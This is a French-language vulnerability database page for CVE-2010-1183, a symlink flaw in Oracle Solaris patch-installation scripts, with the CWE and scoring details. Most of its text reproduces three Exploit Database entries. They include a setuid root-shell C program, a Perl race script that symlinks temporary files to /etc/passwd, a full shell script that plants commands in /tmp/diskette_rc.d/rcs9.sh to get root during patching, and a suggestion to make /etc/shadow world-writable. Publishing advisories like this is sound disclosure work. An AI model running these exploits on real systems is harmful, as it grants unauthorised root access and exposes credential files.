CVE-2010-1183 : Détail

CVE-2010-1183

A01-Broken Access Control
0.04%V3
Local
2010-03-29
20h00 +00:00
2018-10-10
16h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Certain patch-installation scripts in Oracle Solaris allow local users to append data to arbitrary files via a symlink attack on the /tmp/CLEANUP temporary file, related to use of Update Manager.

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-59 Improper Link Resolution Before File Access ('Link Following')
The product attempts to access a file based on the filename, but it does not properly prevent that filename from identifying a link or shortcut that resolves to an unintended resource.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 3.3 AV:L/AC:M/Au:N/C:P/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 26709

Date de publication : 2013-07-08 22h00 +00:00
Auteur : Larry W. Cashdollar
EDB Vérifié : No

Solaris Recommended Patch Cluster 6/19 local root on x86 Larry W. Cashdollar 7/3/2013 @_larry0 If the system administrator is updating the system using update manager or smpatch (multi user mode) a local user could execute commands as root. This only affects x86 systems as this code resides under a case statement checking that the platform is intel based. Local root: Write to /tmp/diskette_rc.d/rcs9.sh before execution and you can execute commands as root. ./144751-01/SUNWos86r/install/postinstall 782 if [ -s /tmp/disketterc.d/rcs9.sh ] 783 then 784 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 785 fi Inject entries into driver_aliases, research config file? maybe we can load our own library/driver? 804 # Remove erroneous entry for Symbios Logic 53c875/95 (ncrs) 805 TMPFILE=/tmp/ncrstmp 806 sed -e '/^ncrs "pci1000,1000"$/d' ${BASEDIR}/etc/driveraliases >$TMPFIL E 807 cp $TMPFILE ${BASEDIR}/etc/driver_aliases ./141445-09/SUNWos86r/install/postinstall 656 if [ -s /tmp/disketterc.d/rcs9.sh ] 657 then 658 /sbin/sh /tmp/disketterc.d/rcs9.sh "post" 659 fi Well, it looks like you've got a few chances to abuse it: larry@slowaris:~/10x86Recommended/patches$ find . -name "*install" -type f -exec grep -l "/sbin/sh /tmp/diskette_rc.d/rcs9.sh" {} \; ./144501-19/SUNWos86r/install/postinstall ./141445-09/SUNWos86r/install/postinstall ./142059-01/SUNWos86r/install/postinstall ./147148-26/SUNWos86r/install/postinstall ./127128-11/SUNWos86r/install/postinstall ./148889-03/SUNWos86r/install/postinstall ./142910-17/SUNWos86r/install/postinstall ./144751-01/SUNWos86r/install/postinstall Psuedo PoC: Depending on how rcs9.sh is created, we can either write to it repeatedly or just create the file initially with our malicious entry. chmod 666 /etc/shadow would be easy. PoC: larry@slowaris:~$ cat setuid.c #include #include int main (void) { char *shell[2]; shell[0] = "sh"; shell[1] = NULL; setregid (0, 0); setreuid (0, 0); execve ("/bin/sh", shell, NULL); return(0); } gcc -o /tmp/r00t setuid.c larry@slowaris:~$ cat /tmp/diskette_rc.d/rcs9.sh chown root:root /tmp/r00t chmod +s /tmp/r00t After patches have been applied: larry@slowaris:~$ /tmp/r00t # id uid=0(root) gid=0(root)
Exploit Database EDB-ID : 20418

Date de publication : 2012-08-10 22h00 +00:00
Auteur : Larry Cashdollar
EDB Vérifié : No

source: https://www.securityfocus.com/bid/54919/info Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain elevated privileges on affected computers. #!/usr/bin/perl $clobber = "/etc/passwd"; while(1) { open ps,"ps -ef | grep -v grep |grep -v PID |"; while(<ps>) { @args = split " ", $_; if (/inetd-upgrade/) { print "Symlinking iconf_entries.$args[1] to $clobber\n"; symlink($clobber,"/tmp/iconf_entries.$args[1]"); exit(1); } } }
Exploit Database EDB-ID : 33799

Date de publication : 2010-03-23 23h00 +00:00
Auteur : Larry W. Cashdollar
EDB Vérifié : Yes

source: https://www.securityfocus.com/bid/38928/info Sun Connection Update Manager for Solaris creates temporary files in an insecure manner. An attacker with local access could potentially exploit these issues to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application. Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial-of-service or privilege escalation. Other attacks may also be possible. These issues affect unknown versions of the application. In addition, these issues may affect certain Solaris patch clusters or individual patch releases. #!/bin/sh #Larry W. Cashdollar, local root for Solaris x86 during patching #10/4/2013 Tested on Cluster 9/30/2013 # larry@s0l4r1s:~$ ./disk_exp.sh # [+] Creating evil shell # [+] Hope you've got gcc on here, compiling... # [+] Waiting for root shell # [+] Tada! # # id # uid=0(root) gid=0(root) echo "[+] Creating evil shell" cat << EOF > r00t.c #include <stdio.h> #include <unistd.h> int main (void) { char *shell[2]; shell[0] = "sh"; shell[1] = NULL; setreuid (0, 0); setregid (0, 0); execve ("/bin/sh", shell, NULL); return(0); } EOF echo "[+] Hope you've got gcc on here, compiling..." gcc r00t.c -o /tmp/r00t mkdir -p /tmp/diskette_rc.d/ echo "#!/bin/sh" > /tmp/diskette_rc.d/rcs9.sh echo "chown root:root /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh echo "chmod +s /tmp/r00t" >> /tmp/diskette_rc.d/rcs9.sh chmod +x /tmp/diskette_rc.d/rcs9.sh echo "[+] Waiting for root shell" until [ -u /tmp/r00t ]; do sleep 1; done; echo "[+] Tada!";/tmp/r00t

Products Mentioned

Configuraton 0

Sun>>Solaris >> Version *

Références

http://www.securityfocus.com/bid/38928
Tags : vdb-entry, x_refsource_BID